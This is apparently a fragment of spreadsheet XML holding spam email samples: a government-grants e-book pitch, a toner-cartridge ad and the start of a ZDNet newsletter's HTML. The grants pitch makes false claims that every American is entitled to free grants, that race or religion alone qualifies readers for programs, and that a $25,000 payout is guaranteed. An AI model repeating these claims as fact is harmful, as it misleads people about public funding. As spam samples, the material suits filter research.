 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://www.2003marketing.com/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 If above link doesn't work, &lt;a href="http://2003marketing.com/grants.htm"&gt;Click Here
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 2394YTyQ5-342YskU3943ol21
 --DeathToSpamDeathToSpamDeathToSpam--
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-Sightings mailing list
 Spamassassin-Sightings@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-sightings
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          JRTX
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HR&gt;
 &lt;html&gt;
 &lt;div bgcolor=3D"#FFFFCC"&gt;
   &lt;p align=3D"center"&gt;&lt;a
 href=3D"http://www.fabulousmail.com"&gt;&lt;img border=3D"0"
 src=3D"http://www.fabulousmail.com/Toners2goLogo.jpg"
 width=3D"349" height=3D"96"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Arial MT
 Black"&gt;&lt;i&gt;Tremendous Savings&lt;/i&gt;
 on Toners,&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Arial MT
 Black"&gt;
 Inkjets, FAX, and Thermal Replenishables!!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.fabulousmail.com"&gt;Toners 2 Go
 &lt;/a&gt;is your secret
 weapon to lowering your cost for &lt;a
 href=3D"http://www.fabulousmail.com"&gt;High Quality,
 Low-Cost&lt;/a&gt; printer
 supplies!&amp;nbsp; We have been in the printer
 replenishables business since 1992,
 and pride ourselves on rapid response and outstanding
 customer service.&amp;nbsp;
 What we sell are 100% compatible replacements for
 Epson, Canon, Hewlett Packard,
 Xerox, Okidata, Brother, and Lexmark; products that
 meet and often exceed
 original manufacturer's specifications.&lt;/p&gt;
 &lt;p&gt;&lt;i&gt;&lt;font size=3D"4"&gt;Check out these
 prices!&lt;/font&gt;&lt;/i&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Epson Stylus
 Color inkjet cartridge
 (SO20108):&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Epson's Price:
 $27.99&amp;nbsp; &lt;font face=3D"Arial MT Black"&gt;&amp;nbsp;&amp;nbsp;
 Toners2Go price: $9.95!&lt;/font&gt;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&amp;nbsp; &lt;font face=3D"Arial MT
 Black"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;HP
 LaserJet 4 Toner Cartridge
 (92298A):&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp=
 ;
 HP's
 Price:
 $88.99&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;font face=3D"Arial MT Black"&gt;Toners2Go
   price: $41.75!&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Come visit us on the web to check out our hundreds
 of similar bargains at &lt;a
 href=3D"http://www.fabulousmail.com"&gt;Toners
 2 Go&lt;/a&gt;!
 &lt;/p&gt;
 &lt;hr&gt;
   request to be removed by clicking &lt;a
 href=3D"http://www.fabulousmail.com/unsubscribe.htm"&gt;HERE&lt;/a&gt;&lt;/span&gt;&lt;/font=
 &gt;&lt;br&gt;
 &lt;/div&gt;
 &lt;/html&gt;
 sarki
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Triple your dial-up Web surfing speeds! Here's how [ANCHORDESK]
</t>
  </si>
  <si>
    <t xml:space="preserve">
  &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ZDNet AnchorDesk Daily Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;
 &lt;div align="center"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table width=612 bgcolor="#232850" cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr valign=bottom&gt;
 &lt;td width=440 colspan=4&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4EmPmBpGX3VynhNBuCqlR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/hd_anchor.gif" width="440" height="60" border="0"  alt="AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
       &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2G9eIMZ4SkMRUVolYrBeR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/ban_160x600_domainsgirl3.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
         &lt;!-- tower --&gt;
                 &lt;br&gt;    
  &lt;table cellpadding=1 cellspacing=0 border=0 width="156" bgcolor="#cccccc"&gt;&lt;tr&gt;&lt;td&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width="154" bgcolor="#ffffff"&gt;
                 &lt;tr&gt;
                         &lt;td width=6&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="6" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=145&gt;
                         &lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="4" border="0"&gt;&lt;br&gt;
   &lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/header2_shameless2.gif" width="145" height="20" vspace=6&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1bVENoxY0VXXjhrHNHyR" &gt;&lt;FONT FACE="Arial, Geneva, Lucida" SIZE="2"&gt;&lt;b&gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="6"&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxz_FHbbJlh9GpMUHM3FR" &gt;&lt;FONT FACE="Arial, Geneva, Lucida" SIZE="2"&gt;&lt;b&gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="6"&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIA9TuG5zsPj9y-DzbW-9R" &gt;&lt;FONT FACE="Arial, Geneva, Lucida" SIZE="2"&gt;&lt;b&gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="6"&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIw9gOoX8bDr4q1O7VpJcR" &gt;&lt;FONT FACE="Arial, Geneva, Lucida" SIZE="2"&gt;&lt;b&gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="6"&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqUjy6P-Vb8HYULuonXiR" &gt;&lt;FONT FACE="Arial, Geneva, Lucida" SIZE="2"&gt;&lt;b&gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src="http://www.zdnet.com/graphics/clear.gif" width="1" height="6"&gt;&lt;br&gt;
          &lt;br&gt;
                         &lt;/td&gt;
                         &lt;td width=3&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="3" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;
 &lt;td width=12 colspan=3 valign=bottom&gt;&lt;img src="http://www.zdnet.com/techupdate/i/gl_corner2.gif" width="12" height="6" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=428 bgcolor="#ffffff"&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=428 bgcolor="#ffffef"&gt;
                         &lt;tr valign=top&gt;
